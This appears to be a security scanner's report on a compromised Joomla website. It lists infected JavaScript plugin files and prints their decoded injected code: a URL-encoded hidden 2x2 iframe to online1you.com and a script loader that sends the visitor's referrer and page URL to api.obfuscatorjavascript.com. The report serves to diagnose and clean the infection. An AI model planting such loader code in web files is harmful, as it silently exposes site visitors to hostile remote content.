Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=annabelarmour.com
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://annabelarmour.com/ | 200 OK Content-Length: 3827 Content-Type: text/html | clean |
http://annabelarmour.com/media/system/js/caption.js | 200 OK Content-Length: 3359 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = Antivirus reports:
| ||
http://annabelarmour.com/plugins/content/highslide/highslide-full.packed.js | 200 OK Content-Length: 33990 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('m k={4A:\'O/9n/\',6H:\'9o.82\',8O:10,5M:4m,8U:10,8Z:4m,4F:15,64:15,3X:15,2Q:15,4L:9A,6E:\'5x R 1P 2d, 9t 8J 9q R 2V. 9B 9k 9p 14 1S 8J 5z.\',81:\'ah...\',7Z:\ Antivirus reports:
| ||
http://annabelarmour.com/plugins/content/highslide/easing_equations.js | 200 OK Content-Length: 10970 Content-Type: text/javascript | malicious |
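Malicious code - confirmed by antiviruses (see below)
Math.linearTween = function (t, b, c, d) { return c*t/d + b; }; Math.easeInQuad = function (t, b, c, d) { return c*(t/=d)*t + b; }; Math.easeOutQuad = function (t, b, c, d) { return -c *(t/=d)*(t-2) + b; }; Math.easeInOutQuad = function (t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; return -c/2 * ((--t)*(t-2) - 1) + b; }; Math.easeInCubic = function (
Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/3/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var _0Ol = document.createElement('script'); _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = do _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = document.getElementsByTagName('head')[0]; O1l.appendChild(_0Ol);document.write(unescape(_escape));
Note: the `_escape` string URL-decodes to a `document.write` of a 2x2-pixel iframe whose source is online1you.com/3/search.php?sid=1, and the script element appended to the page head requests api.obfuscatorjavascript.com with the visitor's referrer and page URL as parameters. The decoded excerpt is truncated and repeats the `_0Ol.src` assignment, so it is not a complete listing. The same loader lines appear in the decoded scripts reported for swfobject.js, audio-player.js and wmvplayer.js below. The library code quoted first looks like the file's ordinary content, so the injection was presumably added to an otherwise legitimate file; compare each flagged file against a clean copy of the extension.
Antivirus reports: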
| ||
http://annabelarmour.com/plugins/content/highslide/swfobject.js | 200 OK Content-Length: 8463 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1 Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/3/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var _0Ol = document.createElement('script'); _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = do _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = document.getElementsByTagName('head')[0]; O1l.appendChild(_0Ol);document.write(unescape(_escape)); Antivirus reports:
| ||
http://annabelarmour.com/hsconfig/js/highslide-sitesettings.js | 200 OK Content-Length: 1478 Content-Type: text/javascript | clean |
http://annabelarmour.com/plugins/content/1pixelout/audio-player.js | 200 OK Content-Length: 2374 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ap_instances = new Array();
function ap_stopAll(playerID) { for(var i = 0;i<ap_instances.length;i++) { try { if(ap_instances[i] != playerID) document.getElementById("audioplayer" + ap_instances[i].toString()).SetVariable("closePlayer", 1); else document.getElementById("audioplayer" + ap_instances[i].toString()).SetVariable("closePlayer", 0); } catch( errorObject ) { } } } function ap_registerPlayers() { v Decoded script: function ap_registerPlayers() { var objectID; var objectTags = document.getElementsByTagName("object"); for (var i = 0; i < objectTags.length; i++) { objectID = objectTags[i].id; if (objectID.indexOf("audioplayer") == 0) { ap_instances[i] = objectID.substring(11, objectID.length); } } } /*** called setInterval with function ap_registerPlayers() { var objectID; var objectTags = docu _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = document.getElementsByTagName('head')[0]; O1l.appendChild(_0Ol);document.write(unescape(_escape)); Antivirus reports:
| ||
http://annabelarmour.com/plugins/content/jw_allvideos/players/silverlight.js | 200 OK Content-Length: 19484 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) 
if (!window.Silverlight) { window.Silverlight = { }; } Silverlight._silverlightCount = 0; Silverlight.fwlinkRoot='http://go2.microsoft.com/fwlink/?LinkID='; Silverlight.onGetSilverlight = null; Silverlight.onSilverlightInstalled = function () {window.location.reload(false);}; Silverlight.isInstalled = function(version) { var isVersionSupported=false; var container = null; Antivirus reports:
| ||
http://annabelarmour.com/plugins/content/jw_allvideos/players/wmvplayer.js | 200 OK Content-Length: 25593 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof jeroenwijering == "undefined") { var jeroenwijering = new Object(); jeroenwijering.utils = new Object(); } jeroenwijering.Player = function(cnt,src,cfg) { this.controller; this.model; this.view; this.configuration = { backgroundcolor:'FFFFFF', windowless:'false', file:'', height:'260', image:'', backcolor:'FFFFFF', frontcolor:'000000', lightcolor:'000000', screencolor:'000000', width:'320' Decoded script: var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/3/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var _0Ol = document.createElement('script'); _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = do _0Ol.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1l = document.getElementsByTagName('head')[0]; O1l.appendChild(_0Ol);document.write(unescape(_escape)); Antivirus reports:
| ||
http://annabelarmour.com/plugins/content/jw_allvideos/players/AC_QuickTime.js | 200 OK Content-Length: 10110 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var gArgCountErr = 'The "%%" function requires an even number of arguments.'
+ '\nArguments should be in the form "atttributeName", "attributeValue", ...';
var gTagAttrs = null;
var gQTGeneratorVersion = 1.0;
function AC_QuickTimeVersion() { return gQTGeneratorVersion; }
function _QTComplain(callingFcnName, errMsg)
{
errMsg = errMsg.replace("%%", callingFcnName);
alert(errMsg);
}
function _QTAddAttribute(prefix, slotName, tagName)
{
var value;
value = gTagAttrs[prefi Antivirus reports:
| ||
http://annabelarmour.com/templates/tem_vivagallery/overIE.js | 200 OK Content-Length: 2205 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!--startList = function() { if (document.all&&document.getElementById) { theul = document.getElementById("menu").childNodes[0]; theul.setAttribute('id','menu_ul'); navRoot = document.getElementById("menu_ul"); for (i=0; i<navRoot.childNodes.length; i++) { effect(navRoot); } } } function effect(elementId) { node = elementId.childNodes[i]; if (node.nodeName=="LI") { node.onmouseover=function() Antivirus reports:
| ||
http://annabelarmour.com/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: annabelarmour.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 30 May 2014 17:20:03 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 30 May 2014 17:20:05 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cdbb5b1cd48127a7dd0c37146e4f7a28=oe557j195pfp93745agl5v83k5; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: annabelarmour.com
Referer: http://www.google.com/search?q=annabelarmour.com
Result:
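The result is similar to the first query; no suspicious redirects were found. This check compares only a direct visit with a single Google-referred visit, so it does not rule out redirects that depend on other conditions, such as the user agent or a repeat visit.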